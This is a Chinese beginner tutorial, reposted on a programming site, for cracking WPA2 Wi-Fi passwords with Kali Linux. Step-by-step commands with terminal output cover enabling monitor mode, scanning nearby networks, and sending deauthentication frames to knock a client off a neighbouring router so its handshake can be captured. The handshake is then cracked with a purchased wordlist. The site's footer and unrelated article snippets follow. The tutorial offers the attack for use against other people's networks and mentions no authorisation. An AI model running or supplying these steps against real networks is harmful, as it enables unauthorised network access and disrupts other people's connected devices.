小白教程--- kali(po解)WIFI密码 (图文教程)

kali学得好,牢饭少不了!!!

原理:

模拟WiFi的已连接设备,强制让其下线重连,获取其握手包,使用密码字典(宝丽)婆洁。

环境(准备工作):

无线网卡:RT3070L

第一行信息

┌──(root㉿kali)-[/home/kali]
└─# lsusb                             
Bus 002 Device 018: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 0e0f:0006 VMware, Inc. Virtual Keyboard
Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

linux系统

┌──(root㉿kali)-[/home/kali]
└─# head -n 1 /etc/issue
Kali GNU/Linux Rolling \n \l┌──(root㉿kali)-[/home/kali]
└─# uname -a
Linux kali 6.5.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09) x86_64 GNU/Linux┌──(root㉿kali)-[/home/kali]
└─# uname -r
6.5.0-kali3-amd64

操作步骤:

步骤1:网卡连接虚拟机系统

网卡连接前 lsusb 查看连接信息

┌──(root㉿kali)-[/home/kali]
└─# lsusb
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 0e0f:0006 VMware, Inc. Virtual Keyboard
Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

插上网卡后再次查看信息,确保网卡以连上

第一行就是连上的网卡

┌──(root㉿kali)-[/home/kali]
└─# lsusb
Bus 002 Device 019: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 0e0f:0006 VMware, Inc. Virtual Keyboard
Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

步骤2:查看网卡是否识别 

ifconfig -a

 如果出现 wlan0 则说明网卡已连接成功

┌──(root㉿kali)-[/home/kali]
└─# ifconfig -a
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500ether 00:0c:29:b2:db:62  txqueuelen 1000  (Ethernet)RX packets 15228  bytes 22181855 (21.1 MiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 1395  bytes 97861 (95.5 KiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536inet 127.0.0.1  netmask 255.0.0.0inet6 ::1  prefixlen 128  scopeid 0x10<host>loop  txqueuelen 1000  (Local Loopback)RX packets 884  bytes 44240 (43.2 KiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 884  bytes 44240 (43.2 KiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0wlan0: flags=4098<BROADCAST,MULTICAST>  mtu 1500ether 14:6b:9c:02:72:1a  txqueuelen 1000  (Ethernet)RX packets 0  bytes 0 (0.0 B)RX errors 0  dropped 0  overruns 0  frame 0TX packets 0  bytes 0 (0.0 B)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

步骤3:开启网卡监控

airmon-ng start wlan0
┌──(root㉿kali)-[/home/kali]
└─# airmon-ng start wlan0PHY     Interface       Driver          Chipsetphy14   wlan0           rt2800usb       Ralink Technology, Corp. RT2870/RT3070(mac80211 monitor mode vif enabled for [phy14]wlan0 on [phy14]wlan0mon)(mac80211 station mode vif disabled for [phy14]wlan0)

查看是否监控成功

ifconfig -a

如果出现wlan0mon则说明监控成功

┌──(root㉿kali)-[/home/kali]
└─# ifconfig -a
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500ether 00:0c:29:b2:db:62  txqueuelen 1000  (Ethernet)RX packets 15228  bytes 22181855 (21.1 MiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 1395  bytes 97861 (95.5 KiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536inet 127.0.0.1  netmask 255.0.0.0inet6 ::1  prefixlen 128  scopeid 0x10<host>loop  txqueuelen 1000  (Local Loopback)RX packets 884  bytes 44240 (43.2 KiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 884  bytes 44240 (43.2 KiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500unspec 14-6B-9C-02-72-1A-00-62-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)RX packets 3281  bytes 559070 (545.9 KiB)RX errors 0  dropped 3281  overruns 0  frame 0TX packets 0  bytes 0 (0.0 B)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

步骤4:扫描附近WiFi

airodump-ng wlan0mon

扫描结果如下 ,确定需要破解的WiFi

本文以TP-LINK_97A4为例

 CH  4 ][ Elapsed: 1 min ][ 2024-06-08 01:49                                                                                                               BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                           10:63:4B:30:FD:67  -33       30        0    0  12  270   WPA2 CCMP   PSK  MERCURY_FD67                                                                    16:D8:64:51:4F:EE  -65       10        0    0   6  270   WPA2 CCMP   PSK  <length:  0>                                                                    F4:2A:7D:38:D5:15  -66        2        0    0   6  270   WPA2 CCMP   PSK  TP-LINK_D502                                                                    14:D8:64:50:4F:EE  -66       17        0    0   6  270   WPA2 CCMP   PSK  TP-LINK_4FEE                                                                    C8:75:F4:69:54:92  -56       26        0    0   6  324   WPA2 CCMP   PSK  CMCC-3u4g                                                                       24:69:68:76:97:A4  -37       38       22    0   6  405   WPA2 CCMP   PSK  TP-LINK_97A4                                                                    C0:A4:76:6A:05:EB  -55       23        0    0  11  360   WPA2 CCMP   PSK  CMCC-gURM                                                                       70:AF:6A:8C:45:08  -65        3        2    0  11  130   WPA2 CCMP   PSK  306                                                                             D4:84:09:38:2C:A2  -64       21        1    0  11  270   WPA2 CCMP   PSK  MERCURY_2CA2                                                                    24:CF:24:CD:E9:27  -59       20        0    0  10  130   WPA2 CCMP   PSK  cpdd                                                                            80:8B:1F:98:B2:60  -50       10        0    0   5  270   WPA2 CCMP   PSK  504                                                                             A4:A9:30:FA:FB:E5  -57       31       10    0   4  130   WPA2 CCMP   PSK  Xiaomi_FBE4                                                                     E0:EF:02:01:67:BD  -46       33        6    0   1  360   WPA2 CCMP   PSK  403*                                                                            80:6B:1F:00:26:23  -66       25        2    0   1  130   WPA2 CCMP   PSK  XJT-400M_2622                                                                   C8:BF:4C:95:CB:CF  -59       35        0    0   1  270   WPA2 CCMP   PSK  Xiaomi_43EF                                                                     BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                         24:69:68:76:97:A4  F2:E6:18:8D:02:54  -40    0 - 6      0        1                                                                                        24:69:68:76:97:A4  14:13:33:6C:12:9D  -44    0 - 1      0        3         TP-LINK_97A4                                                                   24:69:68:76:97:A4  76:82:DA:61:E7:B9  -54    1e- 1e     0       31                                                                                        80:8B:1F:98:B2:60  4A:A5:AA:BB:42:DD  -62    0 - 1e     0        6                                                                                        A4:A9:30:FA:FB:E5  C2:58:EB:56:AA:4A  -58    0 -24      0        2                                                                                        E0:EF:02:01:67:BD  F4:D6:20:92:04:42  -44    2e- 1e     0        7                                                                                        80:6B:1F:00:26:23  5C:D0:6E:DF:49:3A  -58    0 - 1e     0        4  

步骤5:命令行等待抓取握手包

airodump-ng -w ./GGX -c 6 --bssid 24:69:68:76:97:A4 wlan0mon -ignore-nefative-oneaa

c:指定信道,即步骤4扫描结果CH列内容

-w:指定抓去握手包的存放路径

–bssid:指定路由器的MAC,即步骤4扫描结果的第一列BSSID

需要更改两个参数,信道和地址,这两个参数分别是扫描wifi时确定要破解的wifi参数

抓取扫描结果,如下,当前WiFi有4台设备连接

 CH  6 ][ GPS  *** No Fix! ***              ][ Elapsed: 36 s ][ 2024-06-08 01:57                                                                           BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                       24:69:68:76:97:A4  -37 100      377       51    0   6  405   WPA2 CCMP   PSK  TP-LINK_97A4                                                                BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                         24:69:68:76:97:A4  14:13:33:6C:12:9D  -34    0 - 1e     0       15         TP-LINK_97A4                                                                   24:69:68:76:97:A4  14:D1:69:11:A5:6C  -46    1e- 6      0       32                                                                                        24:69:68:76:97:A4  F2:E6:18:8D:02:54  -44    1e- 6      0       88                                                                                        24:69:68:76:97:A4  76:82:DA:61:E7:B9  -48    1e- 1e     1       73    

步骤6:抓取握手包

步骤5都界面不需要关闭,模拟期中一台设备,让其断线重连,抓取其握手包。

aireplay-ng -0 5 -a 24:69:68:76:97:A4 -c 14:13:33:6C:12:9D wlan0mon

-0:代表攻击次数,以5次为例

-a:指定路由器的MAC

-c:指定客户机的MAC

└─# aireplay-ng -0 5 -a 24:69:68:76:97:A4 -c 14:13:33:6C:12:9D wlan0mon
02:05:49  Waiting for beacon frame (BSSID: 24:69:68:76:97:A4) on channel 6
02:05:51  Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [80|64 ACKs]
02:05:52  Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [68|53 ACKs]
02:05:53  Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [86|62 ACKs]
02:05:54  Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [65|49 ACKs]
02:05:55  Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [67|39 ACKs]

步骤7:抓取握手包结果

回到步骤5打开的终端,如果出现handshake,则说明握手包抓取成功,

如果抓取失败,则模拟另外一台设备,重复步骤6

CH  6 ][ GPS  *** No Fix! ***              ][ Elapsed: 3 mins ][ 2024-06-08 02:08 ][ WPA handshake: 24:69:68:76:97:A4                                     BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                       24:69:68:76:97:A4  -42  96     1745     1577    2   6  405   WPA2 CCMP   PSK  TP-LINK_97A4                                                                BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                         24:69:68:76:97:A4  B0:D5:9D:6E:BF:48    1    1e- 1e     0       17                                                                                        24:69:68:76:97:A4  14:D1:69:11:A5:6C  -52    0 - 6      0        8                                                                                        24:69:68:76:97:A4  F2:E6:18:8D:02:54  -42    1e- 6      0       42                                                                                        24:69:68:76:97:A4  14:13:33:6C:12:9D  -28   11e- 5e    11     1437  EAPOL  TP-LINK_97A4                                                                   24:69:68:76:97:A4  76:82:DA:61:E7:B9  -52    1e-11e    18      833     

观察目录下是否生成文件

┌──(root㉿kali)-[/home/kali]
└─# ls -l
total 1519876
-rw-r--r-- 1 root root         28 Jun  8 01:57 GGX-01.ivs
-rw-r--r-- 1 root root         28 Jun  8 01:59 GGX-02.ivs
-rw-r--r-- 1 root root       5572 Jun  8 02:06 GGX-03.ivs

步骤8:获取密码字典

此步骤非常重要,能否(婆洁)成功就看它了

可以通过某宝获取,或者是网络上搜索

一般购买无线网卡会赠送字典

步骤9:将密码字典拷贝至于握手包文件同一个路径

┌──(root㉿kali)-[/home/kali]
└─# ls -l
total 1519876
-rw-r--r-- 1 root root         28 Jun  8 01:57 GGX-01.ivs
-rw-r--r-- 1 root root         28 Jun  8 01:59 GGX-02.ivs
-rw-r--r-- 1 root root       5572 Jun  8 02:06 GGX-03.ivs
-rw------- 1 kali kali      16391 Jun  2 10:46 wordlist.TXT

步骤10:保利婆洁WiFi密码

aircrack-ng -w wordlist.TXT GGX-0*

wordlist.TXT 是字典

婆洁成功界面,密码越简单越容易被婆洁

KEY FOUND!后面的就是密码

                               Aircrack-ng 1.7 [00:00:02] 2039/2109 keys tested (1269.26 k/s) Time left: 0 seconds                                      96.68%KEY FOUND! [ 123456 ]Master Key     : 97 77 C9 45 72 B4 90 9C 56 F7 22 AD F1 E0 8A DC E9 3F 7F 1D A1 D6 AE 79 89 D5 8A FE E1 95 FE 59 Transient Key  : 57 E3 41 E7 5A A3 C3 B2 30 09 17 7D 53 B1 60 BC 05 17 02 B5 3C 78 10 5E 79 3C 81 8D A2 5B 94 C4 08 1C DC EC 31 A2 32 6E 96 D9 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 EAPOL HMAC     : 1C 9E F6 0D 9D 16 92 37 0D 90 6E 9B D9 03 7F B8 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/24895.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

深度解析:ChatGPT全面测评——功能、性能与用户体验全景剖析

从去年底至今&#xff0c;由 OpenAI 发布的大规模语言模型 ChatGPT 引发了几乎所有科技领域从业者的高度关注。据瑞银集团的报告显示&#xff0c;自 2023 年 1 月起&#xff0c;仅两个月内&#xff0c;ChatGPT 的月活用户数便超过了 1 亿。 ChatGPT 被誉为“最强 AI”&#xff…

操作系统总结

进程和线程的区别 本质区别&#xff1a; 进程是资源调度以及分配的基本单位。线程是 CPU 调度的基本单位。 所属关系&#xff1a;一个线程属于一个进程&#xff0c;一个进程可以拥有多个线程。地址空间&#xff1a; 进程有独立的虚拟地址空间。线程没有独立的虚拟地址空间&…

Day53 动态规划part12

LC309买卖股票的最佳时机含冷冻期 与LC122类似&#xff0c;都是可无限次购买股票&#xff0c;只不过引入了冷冻期的概念dp[i][0] 第i天持有股票收益&#xff1b;dp[i][1] 第i天不持有股票收益;情况一&#xff1a;第i天是冷静期&#xff0c;不能以dp[i-1][1]购买股票,所以以dp[…

性能测试 —— Jmeter对数据库压力测试

Jmeter先要和数据库建立连接&#xff0c;sql语句是在Jmeter中写的&#xff0c;但是语句的执行是在数据库里执行的&#xff0c;数据库再将执行结果返回给Jmeter。 在做jmeter数据库压力测试之前&#xff0c;要先检查是否有mysql-connector-java-5.1.39-bin.jar的这个包&#xf…

flink读取hive写入http接口

目录 0、创建hive数据 1、pom.xml 2、flink代码 3、sink 4、提交任务jar 5、flink-conf.yaml 6、数据接收 flink-1.17.2jdk1.8hive-3.1.3hadoop3.3.6passwordhttp0、创建hive数据 /cluster/hive/bin/beeline !connect jdbc:hive2://ip:10000 create database demo; d…

python 多任务之多进程

多任务 优势 多个任务同时执行可以大大提高程序执行效率&#xff0c;可以充分利用CPU资源&#xff0c;提高程序的执行效率 概念 是指在同一时间内执行多个任务 多进程 概念 进程&#xff08;process&#xff09;是资源分配的最小单位&#xff0c;他是操作系统进行资源分配…

鸿蒙北向开发 IDE DevEco Studio 3.1 傻瓜式安装闭坑指南

首先下载 安装IDE 本体程序 DevEco Studio 下载链接 当前最新版本是3.1.1,下载windows版本的 下载下来后是一个压缩包, 解压解锁包后会出现一个exe安装程序 双击运行安装程序 一路 next ( 这里涉及安装文件目录,我因为C盘够大所以全部默认了,各位根据自己情况选择自己的文件…

前端工程化:基于Vue.js 3.0的设计与实践

这里写目录标题 《前端工程化&#xff1a;基于Vue.js 3.0的设计与实践》书籍引言本书概述主要内容作者简介为什么选择这本书&#xff1f;结语 《前端工程化&#xff1a;基于Vue.js 3.0的设计与实践》书籍 够买连接—>https://item.jd.com/13952512.html 引言 在前端技术日…

菜品信息分页查询——后端SpringBoot

1.分页查询的逻辑&#xff1a; 页面发送ajax请求&#xff0c;将分页查询参数(page&#xff0c;pageSize, name)提交到服务端&#xff0c;获取分页数据&#xff1b; 页面发送请求&#xff0c;请求服务端进行图片下载&#xff0c;用于页面图片展示。 开发菜品信息分页查询功能&a…

数字人的技术实现方案比较

数字人的实现方案通常包括以下几个关键技术领域&#xff0c;数字人的实现是一个跨学科的领域&#xff0c;涉及到计算机图形学、人工智能、机器学习、自然语言处理等多个技术领域&#xff0c;随着技术的不断进步&#xff0c;数字人的能力和应用范围将不断扩大。北京木奇移动技术…

数仓开发:如何计算投放效果?

背景介绍 业务介绍&#xff1a;用户是通过低价引流进来&#xff0c;然后通过复购购买高价商品&#xff0c;可以多次购买。低价商品和高价商品均可以退款&#xff0c;高价商品由于各种复杂的场景&#xff0c;可能会有多次退款。低价商品如果退款是全退&#xff0c;不存在多次退…

使用树莓派和 L298N 来 DIY 小车底盘

树莓派小车可以作为 STEM&#xff08;科学、技术、工程、数学&#xff09;教育的工具&#xff0c;在实际操作中帮助学生理解和学习电子技术、编程和机器人原理。可以培养学生的动手能力、解决问题的能力和创新思维。 随着近年 AI 技术的高速发展&#xff0c;SLAM、VSLAM 甚至带…

2024儿科学中文核心期刊汇总,附投稿信息

第10版《中文核心期刊要目总览》入编了8本儿科学期刊&#xff0c;新入编的期刊是《临床小儿外科杂志》。常笑医学整理了儿科学核心期刊的详细参数&#xff0c;供大家在论文投稿时参考&#xff0c;有需要的赶紧收藏&#xff01; 1.《中华儿科杂志》 &#xff08;详细投稿信息请…

【NI国产替代】高速数据采集模块,最大采样率为 125 Msps,支持 FPGA 定制化

• 双通道高精度数据采集 • 支持 FPGA 定制化 • 双通道高精度采样率 最大采样率为 125 Msps12 位 ADC 分辨率 最大输入电压为 0.9 V -3 dB 带宽为 30 MHz 支持 FPGA 定制化 根据需求编程实现特定功能和性能通过定制 FPGA 实现硬件加速&#xff0c;提高系统的运算速度FPGA…

OpenCV学习(4.8) 图像金字塔

1.目的 在这一章当中&#xff0c; 我们将了解图像金字塔。我们将使用图像金字塔创建一个新的水果&#xff0c;“Orapple”我们将看到这些功能&#xff1a; cv.pyrUp&#xff08;&#xff09; &#xff0c; cv.pyrDown&#xff08;&#xff09; 在通常情况下我们使用大小恒定…

node的安装

node是前端开发环境&#xff0c;所以运行前端程序需要安装和配置node 1. 下载安装node 去node官网选择你需要的版本进行下载 Node.js — Download Node.js (nodejs.org) ​ 下载到本地后一路点击next傻瓜式安装&#xff0c;安装成功后测试是否安装成功 node -v 显示node版…

【Ardiuno】使用ESP32网络功能调用接口数据(图文)

接着上文连通wifi后&#xff0c;我们通过使用HTTPClient库进行网络相关操作&#xff0c;这里我们通过http协议进行接口调用。 为了简化操作&#xff0c;这里使用了本地服务器上的文件作为接口&#xff0c;正常操作时会调用接口后&#xff0c;将服务器返回的数据进行解析&#…

白话解读网络爬虫

网络爬虫&#xff08;Web Crawler&#xff09;&#xff0c;也称为网络蜘蛛、网络机器人或网络蠕虫&#xff0c;是一种自动化程序或脚本&#xff0c;被用来浏览互联网并收集信息。网络爬虫的主要功能是在互联网上自动地浏览网页、抓取内容并将其存储在本地或远程服务器上供后续处…

【模拟-BM99 顺时针旋转矩阵】

题目 BM99 顺时针旋转矩阵 描述 有一个NxN整数矩阵&#xff0c;请编写一个算法&#xff0c;将矩阵顺时针旋转90度。 给定一个NxN的矩阵&#xff0c;和矩阵的阶数N,请返回旋转后的NxN矩阵。 分析 模拟&#xff0c;写几个样例&#xff0c;分析一下新矩阵元素下标与原矩阵元素…

编译原理-语法分析(实验 C语言)

语法分析 1. 实验目的 编制一个递归下降分析程序&#xff0c;实现对词法分析程序所提供的单词序列的语法检查和结构分析 2. 实验要求 利用C语言编制递归下降分析程序&#xff0c;并对简单语言进行语法分析 2.1 待分析的简单语言的语法 用扩充的BNF表示如下&#xff1a; …